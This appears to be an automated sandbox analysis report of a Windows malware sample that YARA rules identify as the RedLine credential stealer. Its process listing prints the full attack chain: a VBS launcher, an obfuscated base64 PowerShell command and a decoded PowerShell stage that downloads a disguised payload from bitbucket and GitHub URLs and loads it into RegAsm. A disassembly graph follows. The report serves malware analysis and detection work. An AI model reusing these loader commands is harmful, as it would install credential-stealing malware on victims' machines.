                                                                    2024-09-26 10:16:30 UTC1024INData Raw: 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 39 44 41 41 41 34 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 41 34 4d 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 75 44 41 41 41 30 42 41 41 41 77 43 41 41 41 41 6d 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 41 61 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                    Data Ascii: 8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA9DAAA4DAAAAAAAAAAAAAAAAAAAAAAAAAQAAAA4MAAAw/AAAA/DAAA8PAAAw/AAAAuDAAA0BAAAwCAAAAmDAAA8PAAAw/AAAA/DAAA8PAAAAaAAAAAAAAAAAAAAAAAAAAAAAA


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:06:16:08
                                                                    Start date:26/09/2024
                                                                    Path:C:\Users\user\Desktop\sRMytgfRpJ.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\sRMytgfRpJ.exe"
                                                                    Imagebase:0x7ff7d6fd0000
                                                                    File size:165'376 bytes
                                                                    MD5 hash:51C009ABF871216F8D9E40CDD785CE6C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:1
                                                                    Start time:06:16:08
                                                                    Start date:26/09/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:cmd.exe /c fqt.vbs
                                                                    Imagebase:0x7ff620470000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:2
                                                                    Start time:06:16:08
                                                                    Start date:26/09/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:3
                                                                    Start time:06:16:09
                                                                    Start date:26/09/2024
                                                                    Path:C:\Windows\System32\wscript.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs"
                                                                    Imagebase:0x7ff7c7a00000
                                                                    File size:170'496 bytes
                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:4
                                                                    Start time:06:16:09
                                                                    Start date:26/09/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#DU#MgBs#Gk#dw#v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBS#GU#ZwBB#HM#bQ#n#Cw#I##n#D##Jw#p#Ck#fQB9##==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:5
                                                                    Start time:06:16:09
                                                                    Start date:26/09/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:6
                                                                    Start time:06:16:17
                                                                    Start date:26/09/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:10
                                                                    Start time:06:16:30
                                                                    Start date:26/09/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                    Imagebase:0xcc0000
                                                                    File size:65'440 bytes
                                                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.2070112434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:31.4%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:42%
                                                                      Total number of Nodes:929
                                                                      Total number of Limit Nodes:44
                                                                      execution_graph 2984 7ff7d6fd33a0 2985 7ff7d6fd33bb CallWindowProcA 2984->2985 2986 7ff7d6fd33ac 2984->2986 2987 7ff7d6fd33b7 2985->2987 2986->2985 2986->2987 2988 7ff7d6fd55e0 2989 7ff7d6fd5641 ReadFile 2988->2989 2990 7ff7d6fd560d 2988->2990 2989->2990 2991 7ff7d6fd57e0 2993 7ff7d6fd581e 2991->2993 2994 7ff7d6fd57fc 2991->2994 2992 7ff7d6fd583d SetFilePointer 2992->2994 2993->2992 2993->2994 3012 7ff7d6fd8417 3013 7ff7d6fd8426 _exit 3012->3013 3014 7ff7d6fd842f 3012->3014 3013->3014 3015 7ff7d6fd8444 3014->3015 3016 7ff7d6fd8438 _cexit 3014->3016 3016->3015 3017 7ff7d6fd8b30 _XcptFilter 3018 7ff7d6fd81b0 __getmainargs 2901 7ff7d6fd58b0 2902 7ff7d6fd5904 2901->2902 2903 7ff7d6fd58ee 2901->2903 2906 7ff7d6fd5a29 2902->2906 2908 7ff7d6fd58fc 2902->2908 2911 7ff7d6fd591a 2902->2911 2904 7ff7d6fd5770 CloseHandle 2903->2904 2903->2908 2904->2908 2905 7ff7d6fd8470 7 API calls 2907 7ff7d6fd5af4 2905->2907 2909 7ff7d6fd5a35 SetWindowTextA 2906->2909 2910 7ff7d6fd5a4a 2906->2910 2908->2905 2909->2910 2910->2908 2926 7ff7d6fd51bc GetFileAttributesA 2910->2926 2911->2908 2913 7ff7d6fd5982 DosDateTimeToFileTime 2911->2913 2913->2908 2915 7ff7d6fd59a3 LocalFileTimeToFileTime 2913->2915 2915->2908 2916 7ff7d6fd59c1 SetFileTime 2915->2916 2916->2908 2917 7ff7d6fd59e9 2916->2917 2919 7ff7d6fd5770 CloseHandle 2917->2919 2918 7ff7d6fd5380 29 API calls 2920 7ff7d6fd5ab5 2918->2920 2921 7ff7d6fd59f2 SetFileAttributesA 2919->2921 2920->2908 2922 7ff7d6fd5ac1 2920->2922 2921->2908 2933 7ff7d6fd527c LocalAlloc 2922->2933 2925 7ff7d6fd5acb 2925->2908 2927 7ff7d6fd525f 2926->2927 2929 7ff7d6fd51de 2926->2929 2927->2908 2927->2918 2928 7ff7d6fd5246 SetFileAttributesA 2928->2927 2929->2927 2929->2928 2930 7ff7d6fd7ac8 28 API calls 2929->2930 2931 7ff7d6fd5228 2930->2931 2931->2927 2931->2928 2932 7ff7d6fd523c 2931->2932 2932->2928 2934 7ff7d6fd52aa 2933->2934 2936 7ff7d6fd52d4 2933->2936 2935 7ff7d6fd4dcc 24 API calls 2934->2935 2937 7ff7d6fd52cd 2935->2937 2936->2936 2938 7ff7d6fd52e4 LocalAlloc 2936->2938 2937->2925 2938->2937 2939 7ff7d6fd5300 2938->2939 2940 7ff7d6fd4dcc 24 API calls 2939->2940 2941 7ff7d6fd5323 LocalFree 2940->2941 2941->2937 3024 7ff7d6fd4a30 3025 7ff7d6fd4a50 3024->3025 3026 7ff7d6fd4a39 SendMessageA 3024->3026 3026->3025 3027 7ff7d6fd3530 3028 7ff7d6fd3802 EndDialog 3027->3028 3029 7ff7d6fd3557 3027->3029 3032 7ff7d6fd356b 3028->3032 3030 7ff7d6fd377e GetDesktopWindow 3029->3030 3031 7ff7d6fd3567 3029->3031 3033 7ff7d6fd4c68 14 API calls 3030->3033 3031->3032 3035 7ff7d6fd3635 GetDlgItemTextA 3031->3035 3036 7ff7d6fd357b 3031->3036 3034 7ff7d6fd3795 SetWindowTextA SendDlgItemMessageA 3033->3034 3034->3032 3037 7ff7d6fd37d8 GetDlgItem EnableWindow 3034->3037 3045 7ff7d6fd365e 3035->3045 3061 7ff7d6fd36e9 3035->3061 3038 7ff7d6fd3584 3036->3038 3039 7ff7d6fd3618 EndDialog 3036->3039 3037->3032 3038->3032 3040 7ff7d6fd3591 LoadStringA 3038->3040 3039->3032 3041 7ff7d6fd35bd 3040->3041 3042 7ff7d6fd35de 3040->3042 3048 7ff7d6fd4dcc 24 API calls 3041->3048 3064 7ff7d6fd4a60 LoadLibraryA 3042->3064 3044 7ff7d6fd4dcc 24 API calls 3044->3032 3047 7ff7d6fd3694 GetFileAttributesA 3045->3047 3045->3061 3050 7ff7d6fd36a8 3047->3050 3051 7ff7d6fd36fa 3047->3051 3062 7ff7d6fd35d7 3048->3062 3049 7ff7d6fd35eb SetDlgItemTextA 3049->3032 3049->3041 3052 7ff7d6fd4dcc 24 API calls 3050->3052 3054 7ff7d6fd7ba8 CharPrevA 3051->3054 3055 7ff7d6fd36cb 3052->3055 3053 7ff7d6fd374b EndDialog 3053->3032 3056 7ff7d6fd370e 3054->3056 3055->3032 3057 7ff7d6fd36d4 CreateDirectoryA 3055->3057 3058 7ff7d6fd6b70 31 API calls 3056->3058 3057->3051 3057->3061 3059 7ff7d6fd3716 3058->3059 3060 7ff7d6fd3721 3059->3060 3059->3061 3060->3062 3063 7ff7d6fd6ca4 38 API calls 3060->3063 3061->3044 3062->3032 3062->3053 3063->3062 3065 7ff7d6fd4c20 3064->3065 3066 7ff7d6fd4aa0 GetProcAddress 3064->3066 3070 7ff7d6fd4dcc 24 API calls 3065->3070 3067 7ff7d6fd4ac2 GetProcAddress 3066->3067 3068 7ff7d6fd4c0a FreeLibrary 3066->3068 3067->3068 3069 7ff7d6fd4ae2 GetProcAddress 3067->3069 3068->3065 3069->3068 3071 7ff7d6fd4b04 3069->3071 3072 7ff7d6fd35e3 3070->3072 3073 7ff7d6fd4b13 GetTempPathA 3071->3073 3078 7ff7d6fd4b65 3071->3078 3072->3032 3072->3049 3074 7ff7d6fd4b2b 3073->3074 3074->3074 3075 7ff7d6fd4b34 CharPrevA 3074->3075 3077 7ff7d6fd4b4e CharPrevA 3075->3077 3075->3078 3076 7ff7d6fd4bee FreeLibrary 3076->3072 3077->3078 3078->3076 3079 7ff7d6fd78b0 3080 7ff7d6fd78fd 3079->3080 3081 7ff7d6fd7ba8 CharPrevA 3080->3081 3082 7ff7d6fd7935 CreateFileA 3081->3082 3083 7ff7d6fd7970 3082->3083 3084 7ff7d6fd797e WriteFile 3082->3084 3087 7ff7d6fd8470 7 API calls 3083->3087 3085 7ff7d6fd79a2 CloseHandle 3084->3085 3085->3083 3088 7ff7d6fd79d5 3087->3088 3089 7ff7d6fd5870 GlobalAlloc 3090 7ff7d6fd33f0 3091 7ff7d6fd3402 3090->3091 3092 7ff7d6fd34ec 3090->3092 3095 7ff7d6fd3441 GetDesktopWindow 3091->3095 3099 7ff7d6fd340f 3091->3099 3093 7ff7d6fd34f5 SendDlgItemMessageA 3092->3093 3094 7ff7d6fd34e5 3092->3094 3093->3094 3097 7ff7d6fd4c68 14 API calls 3095->3097 3096 7ff7d6fd3430 EndDialog 3096->3094 3098 7ff7d6fd3458 6 API calls 3097->3098 3098->3094 3099->3094 3099->3096 2066 7ff7d6fd8200 2085 7ff7d6fd8964 2066->2085 2070 7ff7d6fd824b 2071 7ff7d6fd825d 2070->2071 2072 7ff7d6fd8277 Sleep 2070->2072 2073 7ff7d6fd826d _amsg_exit 2071->2073 2076 7ff7d6fd8284 2071->2076 2072->2070 2073->2076 2074 7ff7d6fd82fc _initterm 2075 7ff7d6fd8319 _IsNonwritableInCurrentImage 2074->2075 2077 7ff7d6fd83f8 _ismbblead 2075->2077 2078 7ff7d6fd837d 2075->2078 2083 7ff7d6fd82dd 2075->2083 2076->2074 2076->2075 2076->2083 2077->2075 2089 7ff7d6fd2c54 GetVersion 2078->2089 2081 7ff7d6fd83cf 2081->2083 2084 7ff7d6fd83d8 _cexit 2081->2084 2082 7ff7d6fd83c7 exit 2082->2081 2084->2083 2086 7ff7d6fd8209 GetStartupInfoW 2085->2086 2087 7ff7d6fd8990 6 API calls 2085->2087 2086->2070 2088 7ff7d6fd8a0f 2087->2088 2088->2086 2090 7ff7d6fd2cc3 2089->2090 2091 7ff7d6fd2c7b 2089->2091 2113 7ff7d6fd2db4 2090->2113 2091->2090 2092 7ff7d6fd2c7f GetModuleHandleW 2091->2092 2092->2090 2094 7ff7d6fd2c97 GetProcAddress 2092->2094 2094->2090 2096 7ff7d6fd2cb2 2094->2096 2096->2090 2097 7ff7d6fd2d7f 2098 7ff7d6fd2d8b CloseHandle 2097->2098 2099 7ff7d6fd2d97 2097->2099 2098->2099 2099->2081 2099->2082 2104 7ff7d6fd2d29 2104->2097 2105 7ff7d6fd2d33 2104->2105 2106 7ff7d6fd2d5e 2104->2106 2230 7ff7d6fd4dcc 2105->2230 2109 7ff7d6fd2d67 ExitWindowsEx 2106->2109 2110 7ff7d6fd2d7a 2106->2110 2109->2097 2259 7ff7d6fd1c0c GetCurrentProcess OpenProcessToken 2110->2259 2114 7ff7d6fd8b09 2113->2114 2115 7ff7d6fd2df9 memset memset 2114->2115 2267 7ff7d6fd5050 FindResourceA SizeofResource 2115->2267 2118 7ff7d6fd2e53 CreateEventA SetEvent 2119 7ff7d6fd5050 7 API calls 2118->2119 2121 7ff7d6fd2e92 2119->2121 2120 7ff7d6fd4dcc 24 API calls 2148 7ff7d6fd2fd9 2120->2148 2122 7ff7d6fd2ed5 2121->2122 2125 7ff7d6fd2fa3 2121->2125 2131 7ff7d6fd2e96 2121->2131 2126 7ff7d6fd5050 7 API calls 2122->2126 2123 7ff7d6fd4dcc 24 API calls 2158 7ff7d6fd2eb4 2123->2158 2272 7ff7d6fd70a8 2125->2272 2129 7ff7d6fd2eec 2126->2129 2129->2131 2132 7ff7d6fd2efe CreateMutexA 2129->2132 2131->2123 2132->2125 2135 7ff7d6fd2f22 GetLastError 2132->2135 2133 7ff7d6fd2fc4 2136 7ff7d6fd2fcd 2133->2136 2137 7ff7d6fd2fde FindResourceExA 2133->2137 2134 7ff7d6fd2fb5 2134->2120 2135->2125 2138 7ff7d6fd2f35 2135->2138 2307 7ff7d6fd204c 2136->2307 2140 7ff7d6fd3014 2137->2140 2141 7ff7d6fd2fff LoadResource 2137->2141 2142 7ff7d6fd2f62 2138->2142 2143 7ff7d6fd2f4a 2138->2143 2146 7ff7d6fd301d #17 2140->2146 2147 7ff7d6fd3029 2140->2147 2141->2140 2144 7ff7d6fd4dcc 24 API calls 2142->2144 2145 7ff7d6fd4dcc 24 API calls 2143->2145 2150 7ff7d6fd2f7c 2144->2150 2151 7ff7d6fd2f60 2145->2151 2146->2147 2147->2148 2149 7ff7d6fd303a 2147->2149 2299 7ff7d6fd8470 2148->2299 2322 7ff7d6fd3bf4 GetVersionExA 2149->2322 2150->2125 2153 7ff7d6fd2f81 CloseHandle 2150->2153 2151->2153 2153->2148 2158->2148 2159 7ff7d6fd30ec 2160 7ff7d6fd3116 2159->2160 2161 7ff7d6fd3141 2159->2161 2162 7ff7d6fd3134 2160->2162 2436 7ff7d6fd60a4 2160->2436 2456 7ff7d6fd5fe4 2161->2456 2614 7ff7d6fd3f74 2162->2614 2171 7ff7d6fd8470 7 API calls 2172 7ff7d6fd2ce1 2171->2172 2205 7ff7d6fd61ec 2172->2205 2173 7ff7d6fd315b GetSystemDirectoryA 2174 7ff7d6fd7ba8 CharPrevA 2173->2174 2175 7ff7d6fd3186 LoadLibraryA 2174->2175 2176 7ff7d6fd319f GetProcAddress 2175->2176 2177 7ff7d6fd31c9 FreeLibrary 2175->2177 2176->2177 2178 7ff7d6fd31ba DecryptFileA 2176->2178 2179 7ff7d6fd3273 SetCurrentDirectoryA 2177->2179 2180 7ff7d6fd31e4 2177->2180 2178->2177 2181 7ff7d6fd3291 2179->2181 2182 7ff7d6fd320d 2179->2182 2180->2179 2183 7ff7d6fd31f0 GetWindowsDirectoryA 2180->2183 2191 7ff7d6fd32fb 2181->2191 2194 7ff7d6fd32cb 2181->2194 2204 7ff7d6fd331f 2181->2204 2186 7ff7d6fd4dcc 24 API calls 2182->2186 2183->2182 2184 7ff7d6fd325a 2183->2184 2519 7ff7d6fd6ca4 GetCurrentDirectoryA SetCurrentDirectoryA 2184->2519 2188 7ff7d6fd322b 2186->2188 2633 7ff7d6fd7700 GetLastError 2188->2633 2189 7ff7d6fd3347 2193 7ff7d6fd3368 2189->2193 2568 7ff7d6fd40c4 2189->2568 2190 7ff7d6fd2318 18 API calls 2190->2189 2546 